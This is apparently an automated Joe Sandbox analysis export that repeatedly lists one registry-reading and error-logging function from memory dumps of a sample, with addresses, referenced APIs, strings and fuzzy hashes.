Associated: 00000014.00000002.2560027784.00007FFE11521000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2560045093.00007FFE11524000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ffe11500000_main.jbxd

Similarity

API ID: Closefflushfwrite
String ID: [E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x)$registry_get_value
API String ID: 1001908780-1680961811
Opcode ID: fd93fff9273f651b3e8a54ee41b304a043c5c2319348bbb01805982121bc120f
Instruction ID: bcb7d440656e18428de8e5a1bd1c58599e49d6bce39835c3f74d04403cbb5e67
Opcode Fuzzy Hash: fd93fff9273f651b3e8a54ee41b304a043c5c2319348bbb01805982121bc120f
Instruction Fuzzy Hash: 14F09662A08F4A42E7528F46B8413BD725DAF447B4F480279DD5D466B0EF2DD9859700

Function 00007FFE13308178 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 33registryCOMMON

Download Yara Rule

APIs

RegCloseKey.ADVAPI32 ref: 00007FFE1330810D

Part of subcall function 00007FFE1330A202: fwrite.MSVCRT ref: 00007FFE1330A2AE
Part of subcall function 00007FFE1330A202: fflush.MSVCRT ref: 00007FFE1330A2BA

Strings

registry_get_value, xrefs: 00007FFE13308156
[E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x), xrefs: 00007FFE1330815D

Memory Dump Source

Source File: 00000014.00000002.2560074476.00007FFE13301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE13300000, based on PE: true

Associated: 00000014.00000002.2560059627.00007FFE13300000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.2560096145.00007FFE13310000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.2560114963.00007FFE13318000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.2560131841.00007FFE1331B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.2560148324.00007FFE1331C000.00000008.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ffe13300000_main.jbxd

Similarity

API ID: Closefflushfwrite
String ID: [E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x)$registry_get_value
API String ID: 1001908780-1680961811
Opcode ID: b7cceda3cb23441d6699ae82fe881b405986d1a579641fcc7af4eb1fbd312bd1
Instruction ID: 8c248c190733f8247c88dc96b66a2bd61223d93ef7a7ac77de4feb1eff5ab347
Opcode Fuzzy Hash: b7cceda3cb23441d6699ae82fe881b405986d1a579641fcc7af4eb1fbd312bd1
Instruction Fuzzy Hash: 3FF0F622608F0A89E5528F42F8403B96558BF647B4F080276DD7D6A6A1DF3DD9899308

Function 00007FFE1330805D Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 33registryCOMMON

Download Yara Rule

APIs

RegCloseKey.ADVAPI32 ref: 00007FFE1330810D

Part of subcall function 00007FFE1330A202: fwrite.MSVCRT ref: 00007FFE1330A2AE
Part of subcall function 00007FFE1330A202: fflush.MSVCRT ref: 00007FFE1330A2BA

Strings

registry_get_value, xrefs: 00007FFE13308156
[E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x), xrefs: 00007FFE1330815D

Memory Dump Source

Source File: 00000014.00000002.2560074476.00007FFE13301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE13300000, based on PE: true

Associated: 00000014.00000002.2560059627.00007FFE13300000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.2560096145.00007FFE13310000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.2560114963.00007FFE13318000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.2560131841.00007FFE1331B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.2560148324.00007FFE1331C000.00000008.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ffe13300000_main.jbxd

Similarity

API ID: Closefflushfwrite
String ID: [E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x)$registry_get_value
API String ID: 1001908780-1680961811
Opcode ID: 979aaefb9ee854455b9fc8ba83aaa0ee24a678513e2b235b93815afc7ef0ec21
Instruction ID: e822cacc26250c14dd84ca27b140903586edeb1c573d1e2e063765323073508e
Opcode Fuzzy Hash: 979aaefb9ee854455b9fc8ba83aaa0ee24a678513e2b235b93815afc7ef0ec21
Instruction Fuzzy Hash: 47F0F622608F0A89E5528F42FC403B96558AF647B5F040276DD3D6A6A2DF3DD9899308

Function 00007FFE13308067 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 33registryCOMMON

Download Yara Rule

APIs

RegCloseKey.ADVAPI32 ref: 00007FFE1330810D

Part of subcall function 00007FFE1330A202: fwrite.MSVCRT ref: 00007FFE1330A2AE
Part of subcall function 00007FFE1330A202: fflush.MSVCRT ref: 00007FFE1330A2BA

Strings

registry_get_value, xrefs: 00007FFE13308156
[E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x), xrefs: 00007FFE1330815D

Memory Dump Source

Source File: 00000014.00000002.2560074476.00007FFE13301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE13300000, based on PE: true

Associated: 00000014.00000002.2560059627.00007FFE13300000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.2560096145.00007FFE13310000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.2560114963.00007FFE13318000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.2560131841.00007FFE1331B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.2560148324.00007FFE1331C000.00000008.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ffe13300000_main.jbxd

Similarity

API ID: Closefflushfwrite
String ID: [E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x)$registry_get_value
API String ID: 1001908780-1680961811
Opcode ID: 0cc9a2db373132872f07aa2167d42aeb2a991e803d66af3d86870bf241ac1999
Instruction ID: 63a81312f53407209d79af83dfef1c8f23b823e85fdc665b74308ef6b33bba57
Opcode Fuzzy Hash: 0cc9a2db373132872f07aa2167d42aeb2a991e803d66af3d86870bf241ac1999
Instruction Fuzzy Hash: 77F02B22608E0A89E5528F42FC403BD7558BF647B4F040276DD3C6A6F1DF3DD9899308

Function 00007FFE133080EE Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 33registryCOMMON

Download Yara Rule

APIs

RegCloseKey.ADVAPI32 ref: 00007FFE1330810D

Part of subcall function 00007FFE1330A202: fwrite.MSVCRT ref: 00007FFE1330A2AE
Part of subcall function 00007FFE1330A202: fflush.MSVCRT ref: 00007FFE1330A2BA

Strings

registry_get_value, xrefs: 00007FFE13308156
[E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x), xrefs: 00007FFE1330815D

Memory Dump Source

Source File: 00000014.00000002.2560074476.00007FFE13301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE13300000, based on PE: true

Associated: 00000014.00000002.2560059627.00007FFE13300000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.2560096145.00007FFE13310000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.2560114963.00007FFE13318000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.2560131841.00007FFE1331B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.2560148324.00007FFE1331C000.00000008.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ffe13300000_main.jbxd

Similarity

API ID: Closefflushfwrite
String ID: [E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x)$registry_get_value
API String ID: 1001908780-1680961811
Opcode ID: 4128747c4ca0b8cc9a245100979757ec6d00d611ea27991d761a859eed8a87f0
Instruction ID: c2e25332384e34da53249b29710322886a7c57623db2ca3f520b695683901a96
Opcode Fuzzy Hash: 4128747c4ca0b8cc9a245100979757ec6d00d611ea27991d761a859eed8a87f0
Instruction Fuzzy Hash: 74F0F622608E0A89E5528F42FC403B96558AF647B4F040276DD3D6A6A1DF3DD9899308

Function 00007FFE133080FC Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 33registryCOMMON

Download Yara Rule

APIs

RegCloseKey.ADVAPI32 ref: 00007FFE1330810D

Part of subcall function 00007FFE1330A202: fwrite.MSVCRT ref: 00007FFE1330A2AE
Part of subcall function 00007FFE1330A202: fflush.MSVCRT ref: 00007FFE1330A2BA

Strings

registry_get_value, xrefs: 00007FFE13308156
[E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x), xrefs: 00007FFE1330815D

Memory Dump Source

Source File: 00000014.00000002.2560074476.00007FFE13301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE13300000, based on PE: true

Associated: 00000014.00000002.2560059627.00007FFE13300000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.2560096145.00007FFE13310000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.2560114963.00007FFE13318000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.2560131841.00007FFE1331B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.2560148324.00007FFE1331C000.00000008.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ffe13300000_main.jbxd

Similarity

API ID: Closefflushfwrite
String ID: [E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x)$registry_get_value
API String ID: 1001908780-1680961811
Opcode ID: 4ea518d26ddb2f10070f89be5104cfe22f6a1b4ea3490499cd4cd085461000ac
Instruction ID: 1ce8ac4280d5061e72d7e9bf9cd22e1119cca2ec6a29c8f24a9fca3d78196187
Opcode Fuzzy Hash: 4ea518d26ddb2f10070f89be5104cfe22f6a1b4ea3490499cd4cd085461000ac
Instruction Fuzzy Hash: DEF0F622608E0A8AE5528F42FC403B96558AF647B4F040276DD3D6A6A1DF3DD9899308

Function 00007FFE0EB4271E Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 33registryCOMMON

Download Yara Rule

APIs

RegCloseKey.ADVAPI32 ref: 00007FFE0EB4273D

Part of subcall function 00007FFE0EB41292: fwrite.MSVCRT ref: 00007FFE0EB4133E
Part of subcall function 00007FFE0EB41292: fflush.MSVCRT ref: 00007FFE0EB4134A

Strings

registry_get_value, xrefs: 00007FFE0EB42786
[E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x), xrefs: 00007FFE0EB4278D

Memory Dump Source

Source File: 00000014.00000002.2559615479.00007FFE0EB41000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFE0EB40000, based on PE: true

Associated: 00000014.00000002.2559600601.00007FFE0EB40000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2559637544.00007FFE0EB56000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2559653233.00007FFE0EB60000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2559668361.00007FFE0EB63000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2559683911.00007FFE0EB64000.00000008.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ffe0eb40000_main.jbxd

Similarity

API ID: Closefflushfwrite
String ID: [E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x)$registry_get_value
API String ID: 1001908780-1680961811
Opcode ID: 3895ea5ccc1a9c0ba70ec562e9d7737373ffcc11e245141d9ecc3ceb47b072fc
Instruction ID: 4d6367f23d750e54cbf7b5c6bdcdb0ffc3a1cb4afdfdd422114128118ddbd8ab
Opcode Fuzzy Hash: 3895ea5ccc1a9c0ba70ec562e9d7737373ffcc11e245141d9ecc3ceb47b072fc
Instruction Fuzzy Hash: 18F09662B0874642E5628F04BC403797354FF44794F480136ED8D466B4DF3DDA85AB01

Function 00007FFE0EB4272C Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 33registryCOMMON

Download Yara Rule

APIs

RegCloseKey.ADVAPI32 ref: 00007FFE0EB4273D

Part of subcall function 00007FFE0EB41292: fwrite.MSVCRT ref: 00007FFE0EB4133E
Part of subcall function 00007FFE0EB41292: fflush.MSVCRT ref: 00007FFE0EB4134A

Strings

registry_get_value, xrefs: 00007FFE0EB42786
[E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x), xrefs: 00007FFE0EB4278D

Memory Dump Source

Source File: 00000014.00000002.2559615479.00007FFE0EB41000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFE0EB40000, based on PE: true

Associated: 00000014.00000002.2559600601.00007FFE0EB40000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2559637544.00007FFE0EB56000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2559653233.00007FFE0EB60000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2559668361.00007FFE0EB63000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2559683911.00007FFE0EB64000.00000008.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ffe0eb40000_main.jbxd

Similarity

API ID: Closefflushfwrite
String ID: [E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x)$registry_get_value
API String ID: 1001908780-1680961811
Opcode ID: 0ae7c48307a6deb01bbf84268c238f770e68e431e8e92444f6d98cededd14a4a
Instruction ID: 044903b2d2cece02747f7833f4b3a9fc6c983225c2cdb15cae34df008f4bcfe5
Opcode Fuzzy Hash: 0ae7c48307a6deb01bbf84268c238f770e68e431e8e92444f6d98cededd14a4a
Instruction Fuzzy Hash: 1EF09662B0874642E5628F44B8403797354FF44794F480136ED8D866B4DF3DDA85AB01

Function 00007FFE0EB4268D Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 33registryCOMMON

Download Yara Rule

APIs

RegCloseKey.ADVAPI32 ref: 00007FFE0EB4273D

Part of subcall function 00007FFE0EB41292: fwrite.MSVCRT ref: 00007FFE0EB4133E
Part of subcall function 00007FFE0EB41292: fflush.MSVCRT ref: 00007FFE0EB4134A

Strings

registry_get_value, xrefs: 00007FFE0EB42786
[E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x), xrefs: 00007FFE0EB4278D

Memory Dump Source

Source File: 00000014.00000002.2559615479.00007FFE0EB41000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFE0EB40000, based on PE: true

Associated: 00000014.00000002.2559600601.00007FFE0EB40000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2559637544.00007FFE0EB56000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2559653233.00007FFE0EB60000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2559668361.00007FFE0EB63000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2559683911.00007FFE0EB64000.00000008.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ffe0eb40000_main.jbxd

Similarity

API ID: Closefflushfwrite
String ID: [E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x)$registry_get_value
API String ID: 1001908780-1680961811
Opcode ID: a946e6fb01939640250fe4d87fd1727f894f0189a636eb6478591194451f6b32
Instruction ID: d59f4d71303ca7646aa86d195382bfca98fa3ad25ee7ada5f5e0739565312152
Opcode Fuzzy Hash: a946e6fb01939640250fe4d87fd1727f894f0189a636eb6478591194451f6b32
Instruction Fuzzy Hash: 75F09662B0874A42E5628F04B8403797354FF44795F480235ED8D466B4EF3DDA85AB01

Function 00007FFE0EB42697 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 33registryCOMMON

Download Yara Rule

APIs

RegCloseKey.ADVAPI32 ref: 00007FFE0EB4273D

Part of subcall function 00007FFE0EB41292: fwrite.MSVCRT ref: 00007FFE0EB4133E
Part of subcall function 00007FFE0EB41292: fflush.MSVCRT ref: 00007FFE0EB4134A

Strings

registry_get_value, xrefs: 00007FFE0EB42786
[E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x), xrefs: 00007FFE0EB4278D

Memory Dump Source

Source File: 00000014.00000002.2559615479.00007FFE0EB41000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFE0EB40000, based on PE: true

Associated: 00000014.00000002.2559600601.00007FFE0EB40000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2559637544.00007FFE0EB56000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2559653233.00007FFE0EB60000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2559668361.00007FFE0EB63000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2559683911.00007FFE0EB64000.00000008.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ffe0eb40000_main.jbxd

Similarity

API ID: Closefflushfwrite
String ID: [E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x)$registry_get_value
API String ID: 1001908780-1680961811
Opcode ID: cb64d1539feb0c34fc73d2a78e2a49e7fe7a9be699fe1023e1cdf2c904b94b15
Instruction ID: ae9e141f36b9c0831bb92af63c44a5fb23f5088fc813885a4ceccdc45f64d937
Opcode Fuzzy Hash: cb64d1539feb0c34fc73d2a78e2a49e7fe7a9be699fe1023e1cdf2c904b94b15
Instruction Fuzzy Hash: 58F09662B0874642E5728F04BC403797354FF44794F480135ED8D466B4DF3DDA89AB00

Function 00007FFE0EB427A8 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 33registryCOMMON

Download Yara Rule

APIs

RegCloseKey.ADVAPI32 ref: 00007FFE0EB4273D

Part of subcall function 00007FFE0EB41292: fwrite.MSVCRT ref: 00007FFE0EB4133E
Part of subcall function 00007FFE0EB41292: fflush.MSVCRT ref: 00007FFE0EB4134A

Strings

registry_get_value, xrefs: 00007FFE0EB42786
[E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x), xrefs: 00007FFE0EB4278D

Memory Dump Source

Source File: 00000014.00000002.2559615479.00007FFE0EB41000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFE0EB40000, based on PE: true

Associated: 00000014.00000002.2559600601.00007FFE0EB40000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2559637544.00007FFE0EB56000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2559653233.00007FFE0EB60000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2559668361.00007FFE0EB63000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2559683911.00007FFE0EB64000.00000008.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ffe0eb40000_main.jbxd

Similarity

API ID: Closefflushfwrite
String ID: [E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x)$registry_get_value
API String ID: 1001908780-1680961811
Opcode ID: cda576ce803dd63f734d1a0fb6bc0958773d9d3f96f8f8fa6c15edd8b57912cf
Instruction ID: 06a69a677d2a1ee8c3e1a6ba24ff54d960bcd23942e6877465c3697182eeed66
Opcode Fuzzy Hash: cda576ce803dd63f734d1a0fb6bc0958773d9d3f96f8f8fa6c15edd8b57912cf
Instruction Fuzzy Hash: 20F09662B0874642E6628F04B8403797354FF44794F484235EDCD466B4DF3DDA89AB01

Function 00007FFE0EBD891D Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 33registryCOMMON

Download Yara Rule

APIs

RegCloseKey.ADVAPI32 ref: 00007FFE0EBD89CD

Part of subcall function 00007FFE0EBD1292: fwrite.MSVCRT ref: 00007FFE0EBD133E
Part of subcall function 00007FFE0EBD1292: fflush.MSVCRT ref: 00007FFE0EBD134A

Strings

registry_get_value, xrefs: 00007FFE0EBD8A16
[E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x), xrefs: 00007FFE0EBD8A1D

Memory Dump Source

Source File: 00000014.00000002.2559714739.00007FFE0EBD1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FFE0EBD0000, based on PE: true

Associated: 00000014.00000002.2559699117.00007FFE0EBD0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000014.00000002.2559733043.00007FFE0EBE3000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000014.00000002.2559748990.00007FFE0EBEC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000014.00000002.2559764197.00007FFE0EBEF000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000014.00000002.2559777530.00007FFE0EBF0000.00000008.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ffe0ebd0000_main.jbxd

Similarity

API ID: Closefflushfwrite
String ID: [E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x)$registry_get_value
API String ID: 1001908780-1680961811
Opcode ID: 676d3f13e198f3de7173fa8373e3709d42d953948c6bae17c404deb5109574b0
Instruction ID: c0f734465569bb2e6c52a05fd1838937d43b8a975adaeb6fe3882c28aa58f4b4
Opcode Fuzzy Hash: 676d3f13e198f3de7173fa8373e3709d42d953948c6bae17c404deb5109574b0
Instruction Fuzzy Hash: FDF0966260D70A42E5768F04B8403B56354AF547A5F480236DDCD467B4FF3EE9859B00

Function 00007FFE0EBD8927 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 33registryCOMMON

Download Yara Rule

APIs

RegCloseKey.ADVAPI32 ref: 00007FFE0EBD89CD

Part of subcall function 00007FFE0EBD1292: fwrite.MSVCRT ref: 00007FFE0EBD133E
Part of subcall function 00007FFE0EBD1292: fflush.MSVCRT ref: 00007FFE0EBD134A

Strings

registry_get_value, xrefs: 00007FFE0EBD8A16
[E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x), xrefs: 00007FFE0EBD8A1D

Memory Dump Source

Source File: 00000014.00000002.2559714739.00007FFE0EBD1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FFE0EBD0000, based on PE: true

Associated: 00000014.00000002.2559699117.00007FFE0EBD0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000014.00000002.2559733043.00007FFE0EBE3000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000014.00000002.2559748990.00007FFE0EBEC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000014.00000002.2559764197.00007FFE0EBEF000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000014.00000002.2559777530.00007FFE0EBF0000.00000008.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ffe0ebd0000_main.jbxd

Similarity

API ID: Closefflushfwrite
String ID: [E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x)$registry_get_value
API String ID: 1001908780-1680961811
Opcode ID: 2e6ac4fc452734bb0c7e0050797ebd2c08b91caccf92f2d43370638ef6e2929f
Instruction ID: 751f8bd81f4e8f7e5e5644a2b5301ea0a5bfe0e5cb7c8b9d81cd545fbf598592
Opcode Fuzzy Hash: 2e6ac4fc452734bb0c7e0050797ebd2c08b91caccf92f2d43370638ef6e2929f
Instruction Fuzzy Hash: 9BF0966260D60642E5768F04BC403B56354BF547A5F480136DDCD467F4FF3EE9899B00

Function 00007FFE0EBD8A38 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 33registryCOMMON

Download Yara Rule

APIs

RegCloseKey.ADVAPI32 ref: 00007FFE0EBD89CD

Part of subcall function 00007FFE0EBD1292: fwrite.MSVCRT ref: 00007FFE0EBD133E
Part of subcall function 00007FFE0EBD1292: fflush.MSVCRT ref: 00007FFE0EBD134A

Strings

registry_get_value, xrefs: 00007FFE0EBD8A16
[E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x), xrefs: 00007FFE0EBD8A1D

Memory Dump Source

Source File: 00000014.00000002.2559714739.00007FFE0EBD1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FFE0EBD0000, based on PE: true

Associated: 00000014.00000002.2559699117.00007FFE0EBD0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000014.00000002.2559733043.00007FFE0EBE3000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000014.00000002.2559748990.00007FFE0EBEC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000014.00000002.2559764197.00007FFE0EBEF000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000014.00000002.2559777530.00007FFE0EBF0000.00000008.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ffe0ebd0000_main.jbxd

Similarity

API ID: Closefflushfwrite
String ID: [E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x)$registry_get_value
API String ID: 1001908780-1680961811
Opcode ID: 181c32daf97e77dc0a1e131eaa5bae658fcc62ff7599e1bdd728a10a01cc927c
Instruction ID: 9e0e65d8bf67a38ed7f7d47937f12ba9f8aeef4b42dacd0dfd1586f432a9766a
Opcode Fuzzy Hash: 181c32daf97e77dc0a1e131eaa5bae658fcc62ff7599e1bdd728a10a01cc927c
Instruction Fuzzy Hash: 0DF0966260D70642E6768F04B8403B56354BF547A5F480236DDCD467B4FF3EE9899B00

Function 00007FFE0EBD89BC Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 33registryCOMMON

Download Yara Rule

APIs

RegCloseKey.ADVAPI32 ref: 00007FFE0EBD89CD

Part of subcall function 00007FFE0EBD1292: fwrite.MSVCRT ref: 00007FFE0EBD133E
Part of subcall function 00007FFE0EBD1292: fflush.MSVCRT ref: 00007FFE0EBD134A

Strings

registry_get_value, xrefs: 00007FFE0EBD8A16
[E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x), xrefs: 00007FFE0EBD8A1D

Memory Dump Source

Source File: 00000014.00000002.2559714739.00007FFE0EBD1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FFE0EBD0000, based on PE: true

Associated: 00000014.00000002.2559699117.00007FFE0EBD0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000014.00000002.2559733043.00007FFE0EBE3000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000014.00000002.2559748990.00007FFE0EBEC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000014.00000002.2559764197.00007FFE0EBEF000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000014.00000002.2559777530.00007FFE0EBF0000.00000008.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ffe0ebd0000_main.jbxd

Similarity

API ID: Closefflushfwrite
String ID: [E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x)$registry_get_value
API String ID: 1001908780-1680961811
Opcode ID: 2745d26881636b195d42a3cab413b45b001f3d20afc6ac5fa0dcbe039b19ca07
Instruction ID: 40cf6b186f0d7dad6250dc640f31aca71e7ab3e550f7f1c81ed2d6276201c237
Opcode Fuzzy Hash: 2745d26881636b195d42a3cab413b45b001f3d20afc6ac5fa0dcbe039b19ca07
Instruction Fuzzy Hash: FCF0966260D60642E5768F04B8403B56354AF547A5F480136DDCD467B4FF3EE9859B00

Function 00007FFE0EBD89AE Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 33registryCOMMON

Download Yara Rule

APIs

RegCloseKey.ADVAPI32 ref: 00007FFE0EBD89CD

Part of subcall function 00007FFE0EBD1292: fwrite.MSVCRT ref: 00007FFE0EBD133E
Part of subcall function 00007FFE0EBD1292: fflush.MSVCRT ref: 00007FFE0EBD134A

Strings

registry_get_value, xrefs: 00007FFE0EBD8A16
[E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x), xrefs: 00007FFE0EBD8A1D

Memory Dump Source

Source File: 00000014.00000002.2559714739.00007FFE0EBD1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FFE0EBD0000, based on PE: true

Associated: 00000014.00000002.2559699117.00007FFE0EBD0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000014.00000002.2559733043.00007FFE0EBE3000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000014.00000002.2559748990.00007FFE0EBEC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000014.00000002.2559764197.00007FFE0EBEF000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000014.00000002.2559777530.00007FFE0EBF0000.00000008.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ffe0ebd0000_main.jbxd

Similarity

API ID: Closefflushfwrite
String ID: [E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x)$registry_get_value
API String ID: 1001908780-1680961811
Opcode ID: 73bf8a35bb48351cd0d25f1bb76652707aface3227f603294c8b4d980d48cf6f
